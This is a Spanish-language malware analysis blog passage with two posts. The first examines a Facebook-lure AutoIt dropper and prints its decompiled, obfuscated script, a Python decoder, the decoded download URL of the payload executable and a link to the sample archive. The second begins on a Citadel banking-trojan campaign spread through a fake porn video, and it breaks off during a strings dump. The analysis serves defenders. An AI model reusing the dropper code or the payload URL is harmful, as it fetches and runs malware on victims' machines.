<strong style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;">ATENÇÃO:</strong><span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;"> Denúncia de imagem de caráter impróprio constando em sua linha do tempo.</span></div>
<div>
<span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ptDvPjRjFHFVnCP-gp-LZFIqBq4P3GxA1Vi1pLFcPZDKnx2i2ibocP0ImAhGdde8ELS8yTD4psgFefXdx1uq15jN_CJMZtR9tag0xDC8waR7lFQWKO8bdBcQe6uE-tZfDFaEDk-OmZ8/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ptDvPjRjFHFVnCP-gp-LZFIqBq4P3GxA1Vi1pLFcPZDKnx2i2ibocP0ImAhGdde8ELS8yTD4psgFefXdx1uq15jN_CJMZtR9tag0xDC8waR7lFQWKO8bdBcQe6uE-tZfDFaEDk-OmZ8/s400/01.jpg" width="372" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El link descarga un ejecutable</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAPCncp1_xdMVbQ5cA9t0HbLI9-AW1750_ybZtxH7y8lTeBCAuqcPkOmGShHWYDtrqtwu0SzfCQc6jw1LcW6xRcqDsdJ8iBCpJt6NWVO4TlpWW-zYUXInW1BcqAwW8H2x24PJSd7vEl8/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAPCncp1_xdMVbQ5cA9t0HbLI9-AW1750_ybZtxH7y8lTeBCAuqcPkOmGShHWYDtrqtwu0SzfCQc6jw1LcW6xRcqDsdJ8iBCpJt6NWVO4TlpWW-zYUXInW1BcqAwW8H2x24PJSd7vEl8/s320/02.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Analizado en V.T. se puede observar un indice muy bajo en detecciones.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWi-9xS67FUiMKouiI3hmuB5nA8_Xfy_UHXMLBMjtdkch36xtjcFUdlLThyphenhyphena_Ug9ng9EqmsM_7By0QI8USV4nR6yFdqtLyAE5vmbRxLZtaQ4yRwE_ZautNHxA4oyozfNcdCLUyTeW0bHs/s1600/VT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWi-9xS67FUiMKouiI3hmuB5nA8_Xfy_UHXMLBMjtdkch36xtjcFUdlLThyphenhyphena_Ug9ng9EqmsM_7By0QI8USV4nR6yFdqtLyAE5vmbRxLZtaQ4yRwE_ZautNHxA4oyozfNcdCLUyTeW0bHs/s320/VT.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El binario esta compilado con Autoit, conteniendo un Script Ofuscado.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC8IqIuMPfeWr9gSmv9EgD2BuHn9WQAIMoqxpwNpVkhU3VcSJirQm_o3PvBu3CNwKsIAPTOaZuY9aBlM46_4jmu7qDDy7ecf3mXViI36SQYLQ-61wwoC8P6JF6MhnHefYphMeXoKEdMKg/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC8IqIuMPfeWr9gSmv9EgD2BuHn9WQAIMoqxpwNpVkhU3VcSJirQm_o3PvBu3CNwKsIAPTOaZuY9aBlM46_4jmu7qDDy7ecf3mXViI36SQYLQ-61wwoC8P6JF6MhnHefYphMeXoKEdMKg/s320/03.png" width="320" /></a></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Utilizando la herramienta <a href="https://exe2aut.com/">exe2aut</a> llegamos al script que es el siguiente:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSmZlCm867Lq5KIH2OAGktpdW0VrO5YvD4NeYx1uRNwfYmbvw4zpU9siuJo9VVa7rKkFgvZeI8XniZBUdBKM2pS_UOdkOGO-sSrtARWvPAwCGQJ8EM-6WeQUBxJuI_eSrGmlJygFxMaQA/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSmZlCm867Lq5KIH2OAGktpdW0VrO5YvD4NeYx1uRNwfYmbvw4zpU9siuJo9VVa7rKkFgvZeI8XniZBUdBKM2pS_UOdkOGO-sSrtARWvPAwCGQJ8EM-6WeQUBxJuI_eSrGmlJygFxMaQA/s400/04.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#Region</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#EndRegion</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">If FileExists(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")) Then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EndIf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$urldownloader = chesdvgnqzaltbe("]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ")</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$directory = @TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">InetGet($urldownloader, $directory)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$m01837778 = Sleep(10000)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$y98384632 = Sleep(10000)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Run($directory)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Sleep(9000)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Local $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>For $i = 1 To StringLen($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Next</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Return $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EndFunc</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vemos que hay cadenas codificadas</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Q_hXg^e#ZmZ</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La función <b>chesdvgnqzaltbe</b> es la encargada de decodificar la cadena haciendo una suma de 11 al valor ordinal del carácter.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Local $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>For $i = 1 To StringLen($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Next</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Return $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Con un pequeño programa en Python podemos hacer este mismo trabajo.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">import string</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cadena =']iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ca ='';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">salida = '';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">def sumab(string):</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> data = []</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> for k in xrange(len(string)):</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> se = ord(string[k])</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> xx = (se + 11)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> data += [chr(xx)]</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> return data</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">salida = sumab(cadena);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">for imprime in range(len(salida)):</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ca = ca + salida[imprime]</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">print ca</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Por lo que las cadenas corresponden a lo siguiente:</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://communicare.net.ec/xmlrpc/cache/jscrip.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Q_hXg^e#ZmZ</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
/jscrip.exe</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Lamentablemente para nuestro analisis el sitio donde esta alojado el payload ha excedido el uso del ancho de banda.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGIyXWu_1rjBsbktkwXsaxPhVQKPW9eQMbsgePKIcpdSUOFEKjXKn1hIDa_1weFfbcliKpuA5ZeaI3MXZqyDV6QWY6bhs1MGeYSyfqLesPGZNhSTgSdUO3bDC-tSOZVvzT9kMvKo9SLGc/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGIyXWu_1rjBsbktkwXsaxPhVQKPW9eQMbsgePKIcpdSUOFEKjXKn1hIDa_1weFfbcliKpuA5ZeaI3MXZqyDV6QWY6bhs1MGeYSyfqLesPGZNhSTgSdUO3bDC-tSOZVvzT9kMvKo9SLGc/s400/03.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Con el analisis dinámico llegamos a lo mismo.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí una captura del trafico de red.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM12IjbXG6cLsjRgXi9X632YZOmOnp0VTPcn9z8sjdG9TlW7r-3MZZ0robuPissHbSVFcz9KqtaoCMXyLcycWiH0atNt7Mr0Z0GC6yFSjuAjX8KaRTF6UtCD36q8c7KGM6iAvaK-E5SM/s1600/05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM12IjbXG6cLsjRgXi9X632YZOmOnp0VTPcn9z8sjdG9TlW7r-3MZZ0robuPissHbSVFcz9KqtaoCMXyLcycWiH0atNt7Mr0Z0GC6yFSjuAjX8KaRTF6UtCD36q8c7KGM6iAvaK-E5SM/s320/05.png" width="320" /></a></div>
<div>
<span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;"><br /></span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Muestra: https://www.dropbox.com/s/oubxld1jbo2e4f8/facebook%20malware%2012-11-14.rar</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso es todo por el momento.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-43125498424795216282014-08-23T10:49:00.000-07:002014-08-23T10:49:35.153-07:00<span style="font-family: Arial, Helvetica, sans-serif;"><b>Volvió</b><b> Citadel: Falso </b><span class="ecxEstilo4" style="background-color: white; color: #444444; line-height: 28.399999618530273px; text-align: -webkit-center;"><span class="ecxEstilo3" style="font-weight: bold;">Video Porno de Greisy Ulloa y cómico Edwin Sierra</span></span></span><span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15.199999809265137px; line-height: 21.299999237060547px; text-align: -webkit-center;"> </span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<span style="font-family: Arial, Helvetica, sans-serif;">Hace tiempo que no me topaba con una nueva campaña del Crimenware Citadel. Tal cual como hemos visto en entregas <a href="http://oberheimdmx.blogspot.com.ar/search?q=citadel">anteriores</a>, se apela a ingeniería social para atrapar a los incautos. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3fnhhjaURfmhouHnGCtw3XL6ImslRsQt98Gwq8rDPIeSA3BgR5u_Da3ERcDg4zeEpSZ4-cN5CgiRyHm6ZtweFfhPXz293pO5PQfloz8lTT7q9riJdQc_GpGDTJeYrsdWjbo-hNVifgv4/s1600/fk01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3fnhhjaURfmhouHnGCtw3XL6ImslRsQt98Gwq8rDPIeSA3BgR5u_Da3ERcDg4zeEpSZ4-cN5CgiRyHm6ZtweFfhPXz293pO5PQfloz8lTT7q9riJdQc_GpGDTJeYrsdWjbo-hNVifgv4/s1600/fk01.jpg" height="320" width="298" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhM1k5R6n5DQMdmUrgkO05Q34aJqp8U82alc9d6JgvhBBteG5vI-IupHFikCNC9pScL6UNzy3MpU5fZpDkJwbAte3mOLDfzKOQ6TBEkc6MzJDjJ7RV8ms7ThN3Ly_lj375ApUirBrDLk/s1600/fk02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEhM1k5R6n5DQMdmUrgkO05Q34aJqp8U82alc9d6JgvhBBteG5vI-IupHFikCNC9pScL6UNzy3MpU5fZpDkJwbAte3mOLDfzKOQ6TBEkc6MzJDjJ7RV8ms7ThN3Ly_lj375ApUirBrDLk/s1600/fk02.jpg" height="303" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Descarga del archivo ejecutable.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrI8jn-YqM2hvZpWiYsUgRvUqk4WCH_n28LzNsiHlvsRc_pIVhPsIeuz4rLacDI8JR9LClymo9w_QTFa20C-wZS30XCRTGSL9S0XvfWchGtWK1mO_6JOoPEgUVpJryw71eHLpWKmGKUxs/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrI8jn-YqM2hvZpWiYsUgRvUqk4WCH_n28LzNsiHlvsRc_pIVhPsIeuz4rLacDI8JR9LClymo9w_QTFa20C-wZS30XCRTGSL9S0XvfWchGtWK1mO_6JOoPEgUVpJryw71eHLpWKmGKUxs/s1600/03.jpg" height="233" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Icono de la amenaza, que parece ser un reproductor de video.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_myh-J3L80zCvJAp7ux6lRKgenu2wQHVhAemGHijmIaH9rsGzpQEqLNjno6jh2wcsQ4D6GXK3t7gb4SPRlP3YGGYFMIkqQo7Xfplu_200tgRx3NhkznquwFNfa9A2blXgDOlwRpv5SyM/s1600/icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_myh-J3L80zCvJAp7ux6lRKgenu2wQHVhAemGHijmIaH9rsGzpQEqLNjno6jh2wcsQ4D6GXK3t7gb4SPRlP3YGGYFMIkqQo7Xfplu_200tgRx3NhkznquwFNfa9A2blXgDOlwRpv5SyM/s1600/icon.png" height="320" width="258" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en V.T.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iMnFgK0epMIkDVtSXq2mAWUy1SS2vYLJTvKRbGu7CAWqthh7IWUmhjW7u01LE_kbuQtrLjIO6tpB17ArIhRmpJjOoXJEATGiVBo-P_S7b_3icZg9CJWJSxG6W0RPDygN-KmzvgHRVP4/s1600/vt1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iMnFgK0epMIkDVtSXq2mAWUy1SS2vYLJTvKRbGu7CAWqthh7IWUmhjW7u01LE_kbuQtrLjIO6tpB17ArIhRmpJjOoXJEATGiVBo-P_S7b_3icZg9CJWJSxG6W0RPDygN-KmzvgHRVP4/s1600/vt1.jpg" height="112" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Esta encapsulado con un crypter en Visual Basic.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBn7h8-K5b6MILxZ4GNOMsb2HEj_OHb2XOb-3yLxV8n79PWsN-LZCOgD0YNGCaqEl0qiG6cyi-_c9s9H-CQeAn7jKXJl2HcdSQhAt-PPWn-Ek73vxx4C6Rp2o4ImE9PCyANElYpqyH8ck/s1600/isdp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBn7h8-K5b6MILxZ4GNOMsb2HEj_OHb2XOb-3yLxV8n79PWsN-LZCOgD0YNGCaqEl0qiG6cyi-_c9s9H-CQeAn7jKXJl2HcdSQhAt-PPWn-Ek73vxx4C6Rp2o4ImE9PCyANElYpqyH8ck/s1600/isdp.png" height="286" width="320" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí en el Dump, un String que hace mención al reconocido investigador <a href="http://krebsonsecurity.com/">Brian Krebs</a></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-Sd_V7607oaDUkGmXT7-6BqCl3IIlfUn5H5bSktBz7soMHKT2wbWjAQF7IjsnenjZnan-2LLe7CyV-zzmxvhITySFy0XzOgAWZSHiH7BNnAZ8ZjTXtnIpWFcm4ZlHZnADLQ634NOovQ/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-Sd_V7607oaDUkGmXT7-6BqCl3IIlfUn5H5bSktBz7soMHKT2wbWjAQF7IjsnenjZnan-2LLe7CyV-zzmxvhITySFy0XzOgAWZSHiH7BNnAZ8ZjTXtnIpWFcm4ZlHZnADLQ634NOovQ/s1600/04.png" height="323" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Strings</span></b>.</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040A1E0 ASCII "GET ",0</span></div>
<div class="separator" style="clear: both;">
